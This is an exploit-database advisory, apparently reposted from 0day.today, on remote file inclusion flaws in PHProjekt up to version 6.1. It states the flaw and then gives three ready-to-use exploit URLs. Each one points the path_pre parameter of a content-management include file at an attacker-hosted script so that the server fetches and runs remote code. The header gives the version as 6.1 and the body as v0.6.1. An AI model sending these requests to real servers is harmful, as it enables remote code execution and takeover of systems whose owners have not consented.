id: 731
date: 08/20/2006
title: PHProjekt <= 6.1 (path_pre) Multiple Remote File Include Vulnerabilities
author: the master
cves: 

========================================================================
PHProjekt <= 6.1 (path_pre) Multiple Remote File Include Vulnerabilities
========================================================================



########################################################################
#  Content management module for PHProjekt v0.6.1  Remote File Inclusion Vulnerability
#
#  Found By: the master
#
########################################################################
#  exploit:
#
#  http://[Target]/[Path]/cm_navigation-33.inc.php?path_pre=http://cmd.gif?
#  http://[Target]/[Path]/cm_navigation.inc.php?path_pre=http://cmd.gif?
#  http://[Target]/[Path]/cm_summary.inc.php?path_pre=http://cmd.gif?
########################################################################



#  0day.today [2023-03-26]  #